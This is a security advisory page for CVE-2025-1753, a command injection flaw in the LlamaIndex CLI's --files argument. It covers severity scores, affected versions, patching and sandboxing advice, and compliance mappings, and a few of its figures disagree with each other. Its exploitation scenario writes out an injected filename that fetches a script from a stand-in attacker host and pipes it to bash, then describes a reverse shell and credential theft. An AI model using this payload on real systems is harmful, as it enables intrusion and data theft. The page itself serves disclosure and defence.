CVE-2025-1753: llama-index-cli: OS command injection enables RCE

GHSA-g99h-56mw-8263 HIGH PoC AVAILABLE CISA: ATTEND
Published May 28, 2025
CISO Take

LlamaIndex CLI (prior to v0.4.1) contains an OS command injection flaw where the --files argument is passed unsanitized directly to os.system(), allowing an attacker to execute arbitrary shell commands on the host with the privileges of the running process. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 84th percentile for exploitation likelihood, the blast radius across the LlamaIndex ecosystem is significant — and the trivial exploitation path (low complexity, no user interaction, no special privileges beyond local access) means weaponization requires virtually no skill. Critically, the attack surface extends well beyond local use: any web application that invokes the LlamaIndex CLI with user-supplied filenames is exposed to remote code execution with full confidentiality, integrity, and availability impact. Patch immediately to llama-index-cli ≥ 0.4.1 (corresponding to llama-index ≥ 0.12.21), and audit all code paths that pass external input to the CLI — reject any filename arguments containing shell metacharacters as an interim control.

Sources: NVD EPSS GitHub Advisory ATLAS huntr.com

What is the risk?

High risk. CVSS 7.8 with complete C/I/A impact (C:H/I:H/A:H). The nominal local attack vector (AV:L) understates real-world exposure: any web application wrapping the CLI for document processing tasks creates a direct remote exploitation path. Low attack complexity and no user interaction required make this a low-barrier exploit. EPSS at the 84th percentile signals elevated real-world exploitation probability relative to the CVE population. The combination of 227 downstream dependents, 12 prior CVEs in the package, and a package risk score of 58/100 indicates systemic security debt in this component. Not yet in CISA KEV and no public exploit confirmed, but the exploitation path is trivially constructable from the public description.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
LlamaIndex pip No patch
50.6K 241 dependents Pushed 4d ago 87% patched ~50d to patch Full package profile →
LlamaIndex pip < 0.4.1 0.4.1
50.6K 241 dependents Pushed 4d ago 87% patched ~50d to patch Full package profile →

How severe is it?

CVSS 3.1
7.8 / 10
EPSS
1.0%
chance of exploitation in 30 days
Higher than 60% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Local
AC Low
PR Low
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps
  1. Patch immediately: upgrade llama-index-cli to ≥ 0.4.1 and llama-index to ≥ 0.12.21.

  2. Audit all code that invokes the LlamaIndex CLI and identify every path where --files values derive from user-controlled input.

  3. If patching is not immediately possible, sanitize filename arguments before passing to the CLI — implement an allowlist of safe filename characters and reject any input containing shell metacharacters (;, |, &, $, backtick, parentheses, angle brackets).

  4. Run the CLI in a sandboxed environment (container with dropped capabilities, read-only filesystem where possible, seccomp profile blocking exec syscalls) to limit blast radius.

  5. For detection: monitor for anomalous child processes spawned from LlamaIndex processes, unexpected outbound network connections from document processing workers, or shell interpreter invocations in AI pipeline environments.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.7.3 - AI System Development
NIST AI RMF
MANAGE 2.2 - Mechanisms to respond to AI risks
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-1753?

LlamaIndex CLI (prior to v0.4.1) contains an OS command injection flaw where the --files argument is passed unsanitized directly to os.system(), allowing an attacker to execute arbitrary shell commands on the host with the privileges of the running process. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 84th percentile for exploitation likelihood, the blast radius across the LlamaIndex ecosystem is significant — and the trivial exploitation path (low complexity, no user interaction, no special privileges beyond local access) means weaponization requires virtually no skill. Critically, the attack surface extends well beyond local use: any web application that invokes the LlamaIndex CLI with user-supplied filenames is exposed to remote code execution with full confidentiality, integrity, and availability impact. Patch immediately to llama-index-cli ≥ 0.4.1 (corresponding to llama-index ≥ 0.12.21), and audit all code paths that pass external input to the CLI — reject any filename arguments containing shell metacharacters as an interim control.

Is CVE-2025-1753 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-1753, increasing the risk of exploitation.

How to fix CVE-2025-1753?

1. Patch immediately: upgrade llama-index-cli to ≥ 0.4.1 and llama-index to ≥ 0.12.21. 2. Audit all code that invokes the LlamaIndex CLI and identify every path where --files values derive from user-controlled input. 3. If patching is not immediately possible, sanitize filename arguments before passing to the CLI — implement an allowlist of safe filename characters and reject any input containing shell metacharacters (;, |, &, $, backtick, parentheses, angle brackets). 4. Run the CLI in a sandboxed environment (container with dropped capabilities, read-only filesystem where possible, seccomp profile blocking exec syscalls) to limit blast radius. 5. For detection: monitor for anomalous child processes spawned from LlamaIndex processes, unexpected outbound network connections from document processing workers, or shell interpreter invocations in AI pipeline environments.

What systems are affected by CVE-2025-1753?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, document ingestion pipelines, agent frameworks, LLM application backends.

What is the CVSS score for CVE-2025-1753?

CVE-2025-1753 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 1.03%.

What is the AI security impact?

Affected AI Architectures

RAG pipelinesdocument ingestion pipelinesagent frameworksLLM application backends

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.005 AI Agent Tool
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.7.3
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

LLama-Index CLI prior to v0.4.1, corresponding to LLama-Index prior to v0.12.21, contains an OS command injection vulnerability. The vulnerability arises from the improper handling of the `--files` argument, which is directly passed into `os.system`. An attacker who controls the content of this argument can inject and execute arbitrary shell commands. This vulnerability can be exploited locally if the attacker has control over the CLI arguments, and remotely if a web application calls the LLama-Index CLI with a user-controlled filename. This issue can lead to arbitrary code execution on the affected system.

Exploitation Scenario

An attacker targeting an organization with a LlamaIndex-powered document ingestion API submits a crafted HTTP request where the filename field contains an injected shell command — for example, report.pdf; curl http://attacker.com/payload.sh | bash. The backend application, treating the filename as benign input, passes it to the LlamaIndex CLI via the --files argument. The CLI calls os.system() with the full unsanitized string, executing the attacker's payload with the privileges of the application process. The attacker establishes a reverse shell, exfiltrates the RAG database contents and any API keys or credentials in the environment, then pivots to connected AI infrastructure such as the vector database or model serving endpoints.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
May 28, 2025
Last Modified
May 28, 2025
First Seen
March 24, 2026

Related Vulnerabilities